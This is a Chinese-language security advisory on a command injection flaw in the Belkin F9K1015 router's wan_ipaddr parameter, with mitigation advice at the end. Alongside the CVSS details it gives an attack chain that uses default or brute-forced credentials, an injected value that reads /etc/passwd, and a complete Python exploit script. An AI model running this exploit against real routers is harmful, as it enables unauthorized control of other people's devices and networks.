CVE-2025-11292：Belkin F9K1015路由器命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-11292

漏洞类型

命令注入（Command Injection）

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Belkin F9K1015 路由器

漏洞概述

CVE-2025-11292是存在于Belkin F9K1015路由器固件版本1.00.10中的一个命令注入安全漏洞。该漏洞位于路由器的Web管理界面中，具体存在于/goform/formBSSetSitesurvey端点处。攻击者可以通过操控请求参数wan_ipaddr，将恶意操作系统命令注入到路由器后台执行过程中。由于该路由器管理接口通常通过网络暴露，远程攻击者可以在具备低权限认证的情况下，利用该漏洞在受影响的设备上执行任意系统命令。

该漏洞的CVSS 3.1评分为6.3，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），仅需低权限认证（PR:L），无需用户交互（UI:N）。一旦漏洞被成功利用，将对系统的机密性、完整性和可用性均造成低程度的影响。

值得注意的是，该漏洞的公开PoC（概念验证代码）已经在GitHub等平台上公开发布，攻击者可以直接获取并利用。此外，漏洞发现者曾尝试联系Belkin厂商进行修复，但厂商未作出任何回应，这进一步增加了该漏洞被恶意利用的风险。该漏洞主要影响使用Belkin F9K1015型号路由器的家庭和小型办公网络环境，用户应予以高度关注。

技术细节

该漏洞的根本原因在于Belkin F9K1015路由器固件在处理/goform/formBSSetSitesurvey端点的HTTP请求时，未对参数wan_ipaddr进行充分的输入验证和过滤。具体而言，当用户通过Web管理界面对路由器进行站点勘测（site survey）相关配置时，前端会将wan_ipaddr参数提交至该CGI端点，后端程序在处理该参数时直接将其传递给系统命令执行函数（如system()或exec()），而未对输入内容进行严格的过滤或转义处理。

攻击者可以通过在wan_ipaddr参数中注入shell元字符（如分号、管道符、反引号等），将额外的操作系统命令附加到正常命令之后执行。例如，构造类似`192.168.1.1; cat /etc/passwd`这样的payload，路由器在处理该输入时会将其作为两条命令依次执行，从而导致任意命令执行。

利用条件方面，攻击者需要能够访问路由器的Web管理界面（通常为局域网内的80端口），并具备有效的低权限认证凭据。由于该路由器固件存在已知的默认凭证或弱认证问题，攻击门槛相对较低。漏洞利用的完整流程包括：探测目标路由器管理端口、通过默认/弱口令登录管理界面、构造包含恶意命令的HTTP请求发送至/goform/formBSSetSitesurvey端点、获取命令执行结果或植入后门。

攻击链分析

STEP 1

步骤1：网络侦察

攻击者通过网络扫描工具（如Nmap）发现目标Belkin F9K1015路由器的Web管理界面（默认80端口），确认目标设备的固件版本为1.00.10。

STEP 2

步骤2：获取认证凭据

攻击者通过暴力破解、默认凭证利用或社会工程学等手段，获取路由器Web管理界面的低权限用户认证凭据。

STEP 3

步骤3：登录管理界面

攻击者使用获取的凭据登录路由器Web管理界面，建立有效的认证会话。

STEP 4

步骤4：构造恶意请求

攻击者构造包含恶意命令的HTTP POST请求，在wan_ipaddr参数中注入操作系统命令（如使用分号、管道符等shell元字符进行命令拼接）。

STEP 5

步骤5：发送攻击请求

攻击者将构造好的恶意请求发送至/goform/formBSSetSitesurvey端点，触发路由器后端对未过滤参数的命令执行。

STEP 6

步骤6：执行任意命令

路由器后端在处理请求时执行了注入的恶意命令，攻击者获得在路由器系统上执行任意命令的能力，可进一步植入后门、窃取数据或控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2025-11292 - Belkin F9K1015 Command Injection PoC
Vulnerability: Command injection via wan_ipaddr parameter in /goform/formBSSetSitesurvey
"""

import requests
import sys
from urllib.parse import quote

TARGET = "http://192.168.1.1"
USERNAME = "admin"
PASSWORD = "password"

def exploit(target, cmd):
    """
    Exploit the command injection vulnerability in formBSSetSitesurvey endpoint.
    The wan_ipaddr parameter is passed unsanitized to a shell command.
    """
    session = requests.Session()

    # Step 1: Authenticate to the router's web management interface
    login_url = f"{target}/login.cgi"
    login_data = {
        "login_name": USERNAME,
        "login_pass": PASSWORD,
        "submit": "Login"
    }
    session.post(login_url, data=login_data, timeout=10)

    # Step 2: Inject OS command via wan_ipaddr parameter
    # Using semicolon (;) to chain arbitrary commands
    payload = f"127.0.0.1;{cmd}"
    exploit_url = f"{target}/goform/formBSSetSitesurvey"

    exploit_data = {
        "wan_ipaddr": payload,
        "submit": "Apply"
    }

    try:
        resp = session.post(exploit_url, data=exploit_data, timeout=10)
        print(f"[+] Payload sent: {payload}")
        print(f"[+] Status code: {resp.status_code}")
        print(f"[+] Response length: {len(resp.text)}")
        return resp.text
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <command>")
        print(f"Example: {sys.argv[0]} 'id'")
        sys.exit(1)

    command = sys.argv[1]
    print(f"[*] Targeting: {TARGET}")
    print(f"[*] Command to execute: {command}")
    result = exploit(TARGET, command)
    if result:
        print(f"[+] Response:\n{result[:500]}")

影响范围

Belkin F9K1015 1.00.10

防御指南

临时缓解措施

鉴于Belkin厂商未对该漏洞披露作出回应且未提供补丁，建议用户立即采取以下临时缓解措施：1）修改路由器默认管理密码为高强度密码；2）通过防火墙或ACL限制只有可信的局域网IP才能访问路由器管理界面；3）如非必要，关闭路由器的远程管理功能；4）将路由器置于独立的安全网络区域，与其他关键设备隔离；5）监控路由器的异常流量和日志，及时发现潜在攻击行为；6）考虑更换为其他仍在提供安全更新支持的路由器型号。